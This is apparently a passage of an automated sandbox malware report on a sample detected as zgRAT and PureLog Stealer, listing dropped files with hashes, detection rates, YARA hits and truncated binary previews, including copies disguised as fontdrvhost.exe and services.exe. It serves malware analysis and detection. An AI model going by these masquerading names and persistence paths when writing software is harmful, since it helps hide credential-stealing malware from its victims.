                                                                                                                                                                                            SHA-512:296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9...*...8....*(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YGk3y6Tdix.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):86
                                                                                                                                                                                            Entropy (8bit):4.945354912419641
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:h9ui+/1nsWk6HT6XILRFWCxlBAn:hX+lhk6HT8IlFSn
                                                                                                                                                                                            MD5:3104AF651851E2A7D94A45F816A42514
                                                                                                                                                                                            SHA1:769C71E0C70B039167913F223113F5EF1B9ABCCE
                                                                                                                                                                                            SHA-256:AE6F7225122EF709291F36A89BE112F52FB08C806CBA5123D66F10592D034AF1
                                                                                                                                                                                            SHA-512:58FEA055F29B0ED6336EA1DE7A82B92BD01646B419FC149C6DE5BACA5F5DA409791B052C4B012ACBDBDFB0BBC67B1890A1079100AC36C6E40773B2DDFF1E48F8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:%TLMPtFda%%GxsxrlTyjGRkGy%..%viRnrcdwVU%"%SystemDrive%\/Drivers/fontdrvhost.exe"%QcWd%
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (662), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):662
                                                                                                                                                                                            Entropy (8bit):5.888973933888302
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:Jo7gpSgWmlTYEohkCcQORBAgTOePaiE7rro7P0bVlD2:AgppvTYEodBO4gCTiEroIbe
                                                                                                                                                                                            MD5:ED500393A9F00B18B29A46DE52688D80
                                                                                                                                                                                            SHA1:2B7745BE740E4477896960F6927AFFCE6114FC85
                                                                                                                                                                                            SHA-256:0307B9477AAFA7158AEB70B5CDD286963B4AB526D0E49806DE99D9A38E5224BE
                                                                                                                                                                                            SHA-512:CD076F178B612EFD18EF9DF4CC9CC5E022C647D22119F08E637BE94C2D775590DBBABBC3A97831F75A3618CB2F412484ED6A7A7F0D5E623BDB66802AEDE62248
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:6CTVhELp1j0xMMh76EQv3952vuc2DMYh1mkCNmOrRwLR5MygtJbFI2v7GbkwlTloLT6kletUzidGyo7i66I3vTY80n6vCbF8LgGlQN4PZHPkYpJbeB0oKr3157u8h7SXdf5RhVSsC2eoDyjKeeRAlaxdmOqTd5sbz1G3u14JtImSNPyGXjeCqRwCrbpTo8OHKCyMrpankIRdyfPXaj53bpvhFDMSLkeu3fHLalZrJ0ciASOMLS2EDVpeQRGndIb9ngjTXE6yKNulNNhwzAG3rZqizm4JfvOAZc4dt5yHVE4zkERDtUydChRNzBduKxTY9tLvSDD3L9inf17vV0ZL6u81KqnrcD6ivf012fvpQ5RC9os8DrZUYHbOuUkmaVbICA29BG3zFt4Bd52g8onuomKnDlGh5IP4dJA9vs77yjPoNavycEovsrda0P6ZAV46dAiT52uPrq5FXfZnzRF0eeMvpjJgvh7coSKM1c2jTYDCvYDUzTksQEb9xwnWtOdJtcaEUMvXYfhGaKARfyqc7OMk0LYFygzF54SS799mhMTuhVjnwV05hAMeP0NJxqi2qbKf1rUgyE5u5cDelvSdq4h4syCGv0y0obDFKDwEBTHdFbjxxthCXFLw4QxCoNv8PEGdY7Ti8ObWxDyQPPTBSv
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YGk3y6Tdix.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1991168
                                                                                                                                                                                            Entropy (8bit):7.5618921450859276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
                                                                                                                                                                                            MD5:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            SHA1:9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
                                                                                                                                                                                            SHA-256:62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
                                                                                                                                                                                            SHA-512:296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9...*...8....*(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):260
                                                                                                                                                                                            Entropy (8bit):5.809403618528889
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:3b72dDzAH/AnhM9OPj0ntBI6qFLxTnDTE6s:3/M1a0QcLxTE6s
                                                                                                                                                                                            MD5:8D34002758E2DD0FB5D785CD0B5A8922
                                                                                                                                                                                            SHA1:61197DE8E4F6AE457F7698D99502BC5C17392D1A
                                                                                                                                                                                            SHA-256:028E09208EF0B517DB8F16CE880B6E1ACE23123333EA8B9D0F7F12E557BA7EDF
                                                                                                                                                                                            SHA-512:98BA4EEC857C97B0836C49837B633A8ED54242DB75EABF51A9C236D28221BCED5A6FD7740BBE9B91AAEF1BE21257BC3D427E22DC361AD59D2D32B3E52DF16DFD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:uZxiIOBUFYzZ9EJnz91cgxZ4tpdlhNGxZSOyoyozx6J0dmSrT5aSTbs6A2yduZx1SC9rzV8BUBoknibHWvSlxxe7jRxw9KEYIRibml277Y7RxITbbrG8HMDehCHhhMBK7QcVA9ev3UoZ0MKb8WUSEFQ6NE3kdUZuWxTgp8abMUEwiooV1qjL1tF19fH6G3Rj43CC2nvA53FtBeYjaisxuO3nschJ0eUTDf1omlcO4jP7oW0fHigiLezqAZUaGlJajwqg
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1991168
                                                                                                                                                                                            Entropy (8bit):7.5618921450859276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
                                                                                                                                                                                            MD5:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            SHA1:9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
                                                                                                                                                                                            SHA-256:62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
                                                                                                                                                                                            SHA-512:296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9...*...8....*(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1991168
                                                                                                                                                                                            Entropy (8bit):7.5618921450859276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
                                                                                                                                                                                            MD5:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            SHA1:9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
                                                                                                                                                                                            SHA-256:62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
                                                                                                                                                                                            SHA-512:296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9...*...8....*(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (630), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):630
                                                                                                                                                                                            Entropy (8bit):5.8879503955421715
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:G4sxHMcX+CawOmdWNzDG4bIMfnw9P0Bvym6nOWxSFnWqcQ8FAF4biT0bAqbr3Km:Exs+AwmzDGs3nw9kqm6nOWxmWdQ8FFUA
                                                                                                                                                                                            MD5:70DF5E0FEE0B7C60B3F12EB0FADC6D39
                                                                                                                                                                                            SHA1:8B3E40D1E02D9D7FC5DE2F2EE1CE1790DA47154B
                                                                                                                                                                                            SHA-256:E60A90D50E1515C49697B9DAD07903A8176D175108B925B729CD597D747DABAC
                                                                                                                                                                                            SHA-512:82DB715CD323A2D18344118074F5DE0E41CA34476A75523003E337F71BB39BA7C78FD39A38BEB8B016F482BDD304AF99C0E5C22E6B9F7FABE180FE3E6B9D16B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:lbZfn4GtUOxAA00oKhex4dK6II7MA87aw7D3McaKqgMhY9zZphAEolsHQcXe64tVRWNDx6bsHUHYRniITigc83vLO5muF5Ovx0PBvvmsFS6UdU0n4OLYXQXYlCy1UrnMFVlaXgWh5yWq6br4F8z0uzYgd1at7vXYouOHtZQY1nci4qcJV3vV1wbP7E7fGnkKa8BLMjLqsb9HXzmwZQYE9Cg2S8KocuSODRH5pQ6vrFnaxU2HcKGzPgLYbI3OZhN7JuEGrqHIUmW3YFF8GDLRoc9gGtdgXsWJ1pRCQwZwD7fmJRAVD5HWW5TqvhA8MkvlQMBsyCrUnZOq7XWysIdbkAx6WkRtwajcL3V7QRhANxs6rnsXKLPEHUBQYFWNu8iMzweEBZibkcNwR1Pt24ikKeV12FiK5TPPPgG4IoWvnydoGO8h0mV0Z8BVanM50XfRM8hvuUkOhx6VBrvoHBUT8Z0Revefca4PTMbIqNwgBHTlBpTt1iyyDMTxHQQ8zFwH2rCzPn74OyR0GPQzbvn4lGMH2nAa6yq6VLsTnedOk4kP4cr2AbgEb2fwe56mmh7aHVf4g6M7SYTrf6Ma6IZfRledq6yri0mC6JHj7xWEPjwCiyQisfqeHc
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1991168
                                                                                                                                                                                            Entropy (8bit):7.5618921450859276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
                                                                                                                                                                                            MD5:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            SHA1:9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
                                                                                                                                                                                            SHA-256:62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
                                                                                                                                                                                            SHA-512:296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9...*...8....*(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (607), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                            Entropy (8bit):5.895697661864278
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:bM3dwSCgk6N0hrjmAecry+FkbiRvz/Z7lmc3ApAriD+6yK:SRO1wsrHFkbiRb/CZDtb
                                                                                                                                                                                            MD5:1A1984AE9E949B8FD4E7A4FCCE82B19C
                                                                                                                                                                                            SHA1:52FE6E259133611B9A151A99E264BF9099946FE8
                                                                                                                                                                                            SHA-256:EC17EF974D2B86E133BA8C7A3E5767EA68676E78E4C4A41419046BE1A1BA3110
                                                                                                                                                                                            SHA-512:E53DA2843CFD6DBF479A0727DD2718C86A2947F774A1C7AC3FA1E481FA491B8B592C8D6E22E14285D2AE4182CF1EBF8403F5716AF11E816E2AA07C8373AC1401
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:6RnMQVHDBHWd1Nepp94txyqcXUYafaIGNojBYJjSA1ykDVuIKDtdHpxHkKz57qil8QPNndRgZms59FZCkQQbqp8h0baNTnUUTNmxFherwMDe71HfvxVqaG4TRsWMCDNvRXmwdl7Cvjpeldj8T5bgSo4NSTfWKRos9SNkPVBJ0T51aarxIX3HlrdncYeKGk1d47eTQ9t83Rp9sDw1lrOxYgGSzjH001DPbb6d5YhIo5NTBd4ZlmiYWEFY0Mdq22HCOZhRHT6NKFIcSxQVorOOSp3WVimt40PwxLFl5nSSqVNQ6mFD5ICLn3tifL5iqMSUzWoHroZBZ6h7cnasdjyvyEI4bgGustleC2bj77VQtBvqWwG2vMFHYgguNuqKipSqUD5jL0vfNhCxScipaN8fneFfWqWNRLrEsFVS0gq4bk30etcvMAtVqxC07aMfehOC08ENGPy3gEEDlPBnOkBQbVX5DfVaULa3W1AfoOp6M0zms9OrYjR3g7kelJKk4XjVnKruPg895EElgvMDQnCu3gXYQf4eEFCzQe8iSec2kS8b398z7GTQVybHwSdtle4zCPUBxnvwLJJkh6fQhEh7vwdbC1v9BsQ
                                                                                                                                                                                            Process:C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):847
                                                                                                                                                                                            Entropy (8bit):5.354334472896228
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2041
                                                                                                                                                                                            Entropy (8bit):5.374034001672589
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
                                                                                                                                                                                            MD5:6594A52AA7EC9BF342D53EF8C5C3F92F
                                                                                                                                                                                            SHA1:E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
                                                                                                                                                                                            SHA-256:1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
                                                                                                                                                                                            SHA-512:29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                            Entropy (8bit):4.403856189774723
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:M6qIBL+I:bL
                                                                                                                                                                                            MD5:1AD0C653FFA1B3EDE4F9237EC5569EA0
                                                                                                                                                                                            SHA1:84D732F3162A7133864A766C2409154C11C230BA
                                                                                                                                                                                            SHA-256:D054B2921EC4808B6F120E4A7DCACF8D81581A2DC306B3F2C58F28FACE4C2A24
                                                                                                                                                                                            SHA-512:89D43F12DFC4818A32DE771873192C572AEFD44775A07EDA037D3C93085271190B1134B099902E8F4DDEAC317A094D2B397B32E00CF623E6075E352D4FD42F26
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:bR67xzhBXbMiwvOmWd54VnDMm
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):14
                                                                                                                                                                                            Entropy (8bit):3.378783493486176
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                                                                                                                            MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                                                                                                                            SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                                                                                                                            SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                                                                                                                            SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"Surveys":{}}
                                                                                                                                                                                            Process:C:\Drivers\fontdrvhost.exe
